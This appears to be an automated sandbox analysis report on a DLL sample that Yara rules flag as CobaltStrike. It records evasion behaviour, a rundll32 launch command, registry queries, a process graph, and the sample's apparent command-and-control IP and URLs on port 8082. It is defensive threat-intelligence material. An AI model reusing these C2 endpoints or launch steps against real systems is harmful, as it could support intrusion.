Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll64.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000 Jump to behavior
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWDO=:
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Remote Access Functionality
barindex
Yara detected CobaltStrike
Source: Yara match File source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: 8082-x64.dll.dll, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 780203 Sample: 8082-x64.dll.dll Startdate: 08/01/2023 Architecture: WINDOWS Score: 100 22 Malicious sample detected (through community Yara rule) 2->22 24 Antivirus / Scanner detection for submitted sample 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 4 other signatures 2->28 7 loaddll64.exe 11 2->7         started        process3 dnsIp4 20 20.104.209.69, 49699, 49700, 49701 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->20 10 cmd.exe 1 7->10         started        12 regsvr32.exe 7->12         started        14 conhost.exe 7->14         started        16 3 other processes 7->16 process5 process6 18 rundll32.exe 10->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
20.104.209.69
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://20.104.209.69:8082/broadcast true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
20.104.209.69 true
  • Avira URL Cloud: safe
 unknown
http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod true
  • Avira URL Cloud: safe
 unknown